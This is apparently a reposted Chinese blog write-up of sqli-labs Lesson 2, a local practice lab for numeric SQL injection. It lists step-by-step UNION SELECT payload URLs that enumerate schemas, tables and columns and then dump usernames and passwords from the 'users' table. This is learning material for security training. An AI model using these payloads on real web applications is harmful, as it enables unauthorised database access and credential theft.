sqli-libs(2)


Lesson2:數字型注入我們先來測試一下

http://127.0.0.1/sql1/Less-2/?id=1%20and%201=1

發現未報錯 這里知道我們的數字型注入是不需要 進行單引號閉合的

這里我們構造語句進行爆庫名 因為之前知道這里是3列 所以 我們進行時就不用order by了  這里要注意id的參數為-1

http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20database())

接下來我們進行對數據庫名的查看

http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)

接下來是對表名的爆破

http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)

這里要注意 最后的庫名稱=  的函數是 table_schema= 這個函數 我開始一直寫的 schema_name  一直錯 哈哈

得知表名后 我們可以查看關鍵信息的表 比如uers我覺得就很關鍵

http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)

這里看見username和password應該是我們要數據 所以 開始爆破字段吧

http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,group_concat(id,0x3a,username,0x3a,password)%20from%20security.users

ok 到這里我們就得到關鍵數據 吶 切記 學習不能只求進度 懂了你才能學到知識

少就是多 慢就是快


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM